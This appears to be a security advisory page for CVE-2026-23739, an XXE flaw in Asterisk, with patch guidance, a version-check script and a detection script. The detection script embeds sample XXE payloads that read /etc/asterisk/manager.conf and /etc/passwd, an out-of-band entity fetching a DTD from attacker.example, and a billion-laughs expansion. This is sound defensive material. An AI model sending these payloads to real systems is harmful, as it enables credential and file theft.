CVE-2026-23739

2.0 LOW
XXE

📋 TL;DR

This CVE describes an XML External Entity (XXE) vulnerability in Asterisk's XML parsing code. When untrusted XML reaches that parser, an attacker can make it resolve external entities and read files that the Asterisk process has permission to open. Affected systems are Asterisk installations running a release older than the fixed versions listed below that parse attacker-supplied XML.

💻 Affected Systems

Products:
  • Asterisk
Versions: All versions prior to 20.7-cert9, 20.18.2, 21.12.1, 22.8.2, and 23.2.2
Operating Systems: All operating systems running Asterisk
Default Config Vulnerable: ⚠️ Yes
Notes: The vulnerable code is reached whenever Asterisk parses XML. Which telephony features or integrations expose it to untrusted input depends on the modules you load and on which interfaces accept XML from outside.

📦 What is this software?

Asterisk is an open-source communications platform (PBX, SIP/VoIP gateway, IVR and conferencing engine) written in C and maintained by Sangoma. It is typically deployed on Linux and other Unix-like systems and is configured through text files under /etc/asterisk, which hold SIP, AMI and ARI credentials.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Disclosure of any file the Asterisk process can read, typically /etc/asterisk/*.conf containing SIP, AMI, ARI and database credentials, which an attacker then uses to log in to the management interfaces or place toll-fraud calls. XXE on its own is a read primitive; full host compromise requires chaining it with the disclosed credentials or another weakness, and the damage grows if Asterisk runs as root.

🟠 Likely Case

Limited file disclosure from the Asterisk process context, typically configuration files and telephony-related data.

🟢 If Mitigated

No impact once the patch is applied, or if XML parsing is restricted to trusted sources.

🌐 Internet-Facing: MEDIUM - Requires an exposed interface that accepts XML and hands it to the parser, which may exist through certain telephony interfaces or web APIs.
🏢 Internal Only: MEDIUM - Internal users with access to any XML input mechanism could exploit this vulnerability.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation requires the ability to supply XML input to Asterisk's XML parsing functions, which may be available through various interfaces.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 20.7-cert9, 20.18.2, 21.12.1, 22.8.2, or 23.2.2 depending on your branch

Vendor Advisory: https://github.com/asterisk/asterisk/security/advisories/GHSA-85x7-54wr-vh42

Restart Required: Yes

Instructions:

1. Identify your Asterisk version.
2. Upgrade to the appropriate patched version for your branch.
3. Restart the Asterisk service.
4. Verify the fix is applied.

🔧 Temporary Workarounds

Disable XML processing

Platform: all

If XML features are not required, stop loading the modules that accept XML from external sources. Asterisk's core uses the same libxml2-based parser to load its built-in XML documentation at startup, so XML support cannot be removed outright; the goal is to keep untrusted XML away from the parser, not to remove the parser.

# There is no single switch for this. Review modules.conf and the loaded
# module list ("module show" in the Asterisk CLI) and noload modules you do not need.

Restrict XML input sources

Platform: all

Ensure only trusted, validated XML sources are processed by Asterisk: firewall and authenticate the interfaces that accept XML, and reject documents that contain a DOCTYPE, an ENTITY declaration or XInclude elements before they are handed to Asterisk.

# No Asterisk option does this for you; enforce it at the network edge or in
# the integration that produces the XML.

🧯 If You Can't Patch

  • Block or authenticate every interface that can deliver XML to Asterisk, and reject documents containing a DOCTYPE, ENTITY declarations or XInclude elements before they are parsed
  • Run Asterisk as an unprivileged user with file permissions that limit what the process can read (an XXE read primitive is bounded by the process's own access), and segment Asterisk hosts from networks holding sensitive data

🔍 How to Verify

Check if Vulnerable:

Check Asterisk version with 'asterisk -V' and compare against affected versions list.

Check Version:

asterisk -V

Verify Fix Applied:

Verify the version reported by 'asterisk -V' is 20.7-cert9, 20.18.2, 21.12.1, 22.8.2, or 23.2.2 or newer on its branch. Branches not listed in the advisory (end-of-life releases such as 18.x and 19.x) receive no fix and should be treated as affected.
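The manual check above is easy to get wrong across five branches, so here is a small version comparison that classifies an 'asterisk -V' banner against the fixed releases on this page. This is an added example, not Asterisk project code. It assumes the banner formats "Asterisk 20.5.0" for regular releases and "Asterisk certified/20.7-cert3" for certified builds; adjust the patterns if your build prints differently.

```python
"""Compare an `asterisk -V` banner with the fixed releases for CVE-2026-23739.

Added example, not Asterisk project code. The fixed versions come from the
advisory summary on this page. Assumption: `asterisk -V` prints
"Asterisk 20.5.0" for regular releases and "Asterisk certified/20.7-cert3"
for certified builds; adjust the patterns if your build prints differently.
"""
import re
import subprocess

# First fixed release on each branch, per the advisory.
FIXED = {
    "20-cert": (20, 7, 9),   # 20.7-cert9
    "20": (20, 18, 2),
    "21": (21, 12, 1),
    "22": (22, 8, 2),
    "23": (23, 2, 2),
}

# Certified builds use a different banner shape, so they get their own pattern.
CERT_RE = re.compile(r"Asterisk\s+certified/(\d+)\.(\d+)-cert(\d+)")
RELEASE_RE = re.compile(r"Asterisk\s+(\d+)\.(\d+)\.(\d+)")


def parse_banner(banner):
    """Return (branch_key, version_tuple), or None if the banner is unrecognised."""
    m = CERT_RE.search(banner)
    if m:
        major, minor, cert = (int(x) for x in m.groups())
        return f"{major}-cert", (major, minor, cert)
    m = RELEASE_RE.search(banner)
    if m:
        major, minor, patch = (int(x) for x in m.groups())
        return str(major), (major, minor, patch)
    return None


def is_vulnerable(banner):
    """True if older than the fix for its branch, False if fixed, None if unknown.

    None covers unparseable banners and branches the advisory does not list
    (for example end-of-life 18.x/19.x); treat None as "needs review", not safe.
    """
    parsed = parse_banner(banner)
    if parsed is None:
        return None
    branch, version = parsed
    fixed = FIXED.get(branch)
    if fixed is None:
        return None
    return version < fixed


def check_installed():
    """Run the real `asterisk -V` and classify it; None if the binary is absent."""
    try:
        out = subprocess.run(["asterisk", "-V"], capture_output=True, text=True, check=False)
    except FileNotFoundError:
        return None
    return is_vulnerable(out.stdout)


# Constructed banners for a dry run; not output captured from real systems.
SAMPLE_BANNERS = [
    "Asterisk 20.5.0",
    "Asterisk 20.18.2",
    "Asterisk certified/20.7-cert8",
    "Asterisk 23.1.0",
    "Asterisk 18.9.0",
]

if __name__ == "__main__":
    for b in SAMPLE_BANNERS:
        print(f"{b:35} vulnerable={is_vulnerable(b)}")
    print("installed:", check_installed())
```

Note that the comparison is per branch: 20.18.2 is fixed even though it is numerically "lower" than 21.0.0, which is not, and 20.x certified builds are compared only against 20.7-cert9.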

📡 Detection & Monitoring

Log Indicators:

  • XML parse errors in the Asterisk log that mention DOCTYPE, entities or XInclude
  • The Asterisk process opening files outside its normal working set (auditd or inotify watches on /etc/passwd, /etc/shadow, SSH and TLS key material, and /etc/asterisk from unexpected code paths)
  • Unusually large or slow XML documents being processed, which can indicate entity expansion rather than file read

Network Indicators:

  • XML payloads containing external entity references or XInclude directives sent to Asterisk

SIEM Query:

source="asterisk.log" AND ("<!ENTITY" OR "<!DOCTYPE" OR "XInclude")

The original query matched any message containing "xml", which fires on routine traffic. Note also that the raw payload is rarely written to the Asterisk log, so a capture or proxy in front of the XML-accepting interface is the more reliable data source for the network indicator above.
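To make the network indicator concrete, the following triage routine flags the patterns that matter (DOCTYPE internal subsets, external and parameter entities, XInclude, file:// and remote targets, and entity-reference floods) in a raw XML body. It is an added example for this page, not Asterisk code, and it deliberately does not parse the XML, so it cannot itself be tricked into fetching an entity. The sample documents, hostnames and paths are constructed for illustration.

```python
"""Triage XML payloads for XXE and XInclude indicators.

Added example for the detection section of this page; it is not Asterisk code
and does not parse XML. It runs loose, stdlib-only pattern checks over raw text
(a captured SIP/HTTP body, a log excerpt) so it works offline and cannot itself
be tricked into fetching an entity. The sample documents are constructed.
"""
import re

# Ordered list of (indicator, pattern). Loose by design: these are triage
# signals for a SIEM or a capture pipeline, not a validating parser.
INDICATORS = [
    ("doctype_internal_subset", re.compile(r"<!DOCTYPE[^>]*\[", re.I)),
    ("external_dtd", re.compile(r"<!DOCTYPE\s+[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I)),
    ("external_general_entity",
     re.compile(r"<!ENTITY\s+(?!%)[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.I)),
    ("parameter_entity", re.compile(r"<!ENTITY\s+%\s*[\w.-]+", re.I)),
    ("xinclude", re.compile(
        r"""xmlns(?::\w+)?=["']http://www\.w3\.org/2001/XInclude["']"""
        r"""|<(?:\w+:)?include\b[^>]*\bhref=""", re.I)),
    # file:// and PHP-style wrappers as an entity or XInclude target
    ("local_or_wrapper_uri", re.compile(
        r"""(?:SYSTEM|href)\s*=?\s*["'](?:file|expect|php|gopher|ftp|jar):""", re.I)),
    # out-of-band / blind XXE: the parser is told to fetch something remote
    ("remote_fetch", re.compile(r"""(?:SYSTEM|href)\s*=?\s*["']https?://""", re.I)),
]

# Named entity references other than the five predefined ones; a flood of
# them is the "billion laughs" expansion pattern rather than XXE proper.
ENTITY_REF_RE = re.compile(r"&(?!amp;|lt;|gt;|quot;|apos;)[\w.-]+;")
ENTITY_REF_THRESHOLD = 10


def scan(xml_text):
    """Return the indicator names that fire on the text, in INDICATORS order."""
    hits = [name for name, pattern in INDICATORS if pattern.search(xml_text)]
    if len(ENTITY_REF_RE.findall(xml_text)) >= ENTITY_REF_THRESHOLD:
        hits.append("entity_ref_flood")
    return hits


def is_suspicious(xml_text):
    """Single-bit verdict for a pipeline that only wants to drop or alert."""
    return bool(scan(xml_text))


# Constructed samples; the hostname, paths and contents are illustrative only.
SAMPLES = {
    "benign_pidf": (
        '<?xml version="1.0"?><presence xmlns="urn:ietf:params:xml:ns:pidf" entity="sip:alice@example.com">'
        '<tuple id="t1"><status><basic>open</basic></status></tuple></presence>'
    ),
    "classic_xxe": (
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/asterisk/manager.conf">]>'
        '<foo>&xxe;</foo>'
    ),
    "blind_oob": (
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd;]>'
        '<foo/>'
    ),
    "xinclude": (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        '<xi:include href="file:///etc/passwd" parse="text"/></foo>'
    ),
    "billion_laughs": (
        '<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
        '<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">]><lolz>&lol1;</lolz>'
    ),
}


def triage(samples=SAMPLES):
    """Map each sample name to the indicators it triggers."""
    return {name: scan(text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, hits in triage().items():
        print(f"{name:15} {'ALERT' if hits else 'ok':5} {hits}")
```

A benign PIDF presence document produces no hits, while each attack shape lights up the indicators you would expect, so the same function can back a SIEM rule (alert on any hit) or an inline filter (drop on any hit). The patterns only recognise SYSTEM literals and href attributes; a PUBLIC identifier with a remote URI in its second literal is caught by the DOCTYPE and entity checks but not by remote_fetch.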

🔗 References

  • Vendor advisory: https://github.com/asterisk/asterisk/security/advisories/GHSA-85x7-54wr-vh42
